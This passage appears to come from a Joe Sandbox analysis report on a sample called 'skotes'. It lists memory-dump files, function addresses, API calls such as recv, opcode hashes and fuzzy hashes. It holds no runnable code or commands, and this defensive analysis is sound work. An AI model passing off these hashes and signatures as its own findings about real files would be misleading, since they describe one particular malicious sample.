Associated: 00000003.00000002.1532788863.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532826407.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532857999.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532890478.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532922295.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532959513.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532989434.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533018188.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533046843.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533068917.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533099773.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533132016.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533161308.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533199223.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533222579.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533249817.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533361386.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533396199.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533424171.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533454868.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533489943.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533515592.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533543676.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533571210.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID: +ax4
API String ID: 32384418-3643822463
Opcode ID: 8289eaa63d3cc24bc385eef011161595552173a2236e36310162dd6989b31057
Instruction ID: e514ac44355d6105a6407c475080aef3b4da5d12444861bb33cc771d4999ba6f
Opcode Fuzzy Hash: 8289eaa63d3cc24bc385eef011161595552173a2236e36310162dd6989b31057
Instruction Fuzzy Hash: E74128B1A04608EFDB209B59D906B9FB7ECEF95720F40852AF805D3691EB74DA04C7A1

Function 0090E0C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00000004,00000000), ref: 0090E10B
recv.WS2_32(?,?,00000008,00000000), ref: 0090E140

Strings

+ax4, xrefs: 0090E0D4

Memory Dump Source

Source File: 00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000003.00000002.1530077629.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530404067.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530727548.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530766040.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530801626.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531725930.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531831280.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532331923.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532436211.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532489546.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532518977.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532547585.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532577868.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532605363.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532635329.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532671862.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532699440.0000000000B19000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532743572.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532788863.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532826407.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532857999.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532890478.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532922295.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532959513.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532989434.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533018188.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533046843.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533068917.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533099773.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533132016.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533161308.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533199223.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533222579.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533249817.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533361386.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533396199.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533424171.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533454868.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533489943.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533515592.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533543676.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533571210.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: recv
String ID: +ax4
API String ID: 1507349165-3643822463
Opcode ID: 10429d576b298b5228e7290a63593e2430a606ab477bf824ca308d425ba49f09
Instruction ID: e8eccd54d42bb0abf8690ba6815971a6731c68c850fd029eea4d8d9064c645c9
Opcode Fuzzy Hash: 10429d576b298b5228e7290a63593e2430a606ab477bf824ca308d425ba49f09
Instruction Fuzzy Hash: B4310A71A582489FD720CB6DDC81BEB77BCEB09724F000629F515E73D1CA74A8448B60

Function 0093CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0093CC66

Memory Dump Source

Source File: 00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000003.00000002.1530077629.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530404067.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530727548.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530766040.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530801626.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531725930.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531831280.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532331923.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532436211.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532489546.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532518977.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532547585.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532577868.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532605363.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532635329.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532671862.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532699440.0000000000B19000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532743572.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532788863.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532826407.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532857999.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532890478.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532922295.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532959513.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532989434.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533018188.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533046843.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533068917.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533099773.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533132016.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533161308.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533199223.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533222579.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533249817.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533361386.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533396199.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533424171.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533454868.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533489943.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533515592.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533543676.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533571210.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: f92fa249f10ef3fb10f5d9e9689773018fe52af5358943b86d159d24c19243d1
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: B8B126B2904A459FDB25CF28C881BBEBBE9EF85340F14856AE855FB381D6349D01CF60

Function 009026B0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00902846
___std_exception_destroy.LIBVCRUNTIME ref: 009028E0

Strings

+ax4, xrefs: 009026D8

Memory Dump Source

Source File: 00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000003.00000002.1530077629.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530404067.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530727548.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530766040.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530801626.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531725930.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531831280.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532331923.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532436211.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532489546.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532518977.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532547585.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532577868.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532605363.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532635329.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532671862.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532699440.0000000000B19000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532743572.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532788863.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532826407.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532857999.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532890478.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532922295.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532959513.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532989434.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533018188.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533046843.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533068917.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533099773.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533132016.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533161308.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533199223.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533222579.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533249817.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533361386.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533396199.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533424171.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533454868.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533489943.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533515592.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533543676.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533571210.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: +ax4
API String ID: 2970364248-3643822463
Opcode ID: 25e036256dc1f6d29359bd7a047d7f838dc1c520fbd634e798937ed937493da2
Instruction ID: fc08c67a2a546b7bf97bcd7d119fed8e687f7e67af99c9be5d21e30bad776f1f
Opcode Fuzzy Hash: 25e036256dc1f6d29359bd7a047d7f838dc1c520fbd634e798937ed937493da2
Instruction Fuzzy Hash: 80718F71E002489FDB15CFA8C885BDEFBB5EF99310F14821DE815B7281E774A984CBA5

Function 0090DBE0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 189COMMON

Download Yara Rule

Strings

+ax4, xrefs: 0090DBE6, 0090DD2F
list too long, xrefs: 0090E09D

Memory Dump Source

Source File: 00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000003.00000002.1530077629.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530404067.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530727548.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530766040.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530801626.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531725930.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531831280.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532331923.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532436211.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532489546.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532518977.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532547585.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532577868.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532605363.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532635329.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532671862.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532699440.0000000000B19000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532743572.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532788863.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532826407.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532857999.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532890478.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532922295.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532959513.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532989434.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533018188.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533046843.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533068917.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533099773.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533132016.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533161308.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533199223.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533222579.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533249817.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533361386.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533396199.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533424171.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533454868.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533489943.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533515592.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533543676.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533571210.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_900000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: +ax4$list too long
API String ID: 0-1104832111
Opcode ID: 102c49bcc81713bc7a76871ed20c9b73278611aa4d0b749157f9555101f32fe9
Instruction ID: c0353c67b45fa4d71c462865d1d7184326f5f8906d60725bb3519371a840bb63
Opcode Fuzzy Hash: 102c49bcc81713bc7a76871ed20c9b73278611aa4d0b749157f9555101f32fe9
Instruction Fuzzy Hash: 1861A5B0A04618AFDB20DF64CD85B9AB7B8EF44714F0045AAF81DA7281EB70A985CF51

Function 00902900 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 009029DF

Strings

+ax4, xrefs: 00902915
+ax4, xrefs: 009029C4

Memory Dump Source

Source File: 00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000003.00000002.1530077629.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530404067.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530727548.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530766040.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530801626.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531725930.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531831280.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532331923.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532436211.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532489546.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532518977.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532547585.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532577868.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532605363.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532635329.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532671862.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532699440.0000000000B19000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532743572.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532788863.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532826407.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532857999.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532890478.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532922295.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532959513.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532989434.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533018188.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533046843.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533068917.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533099773.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533132016.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533161308.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
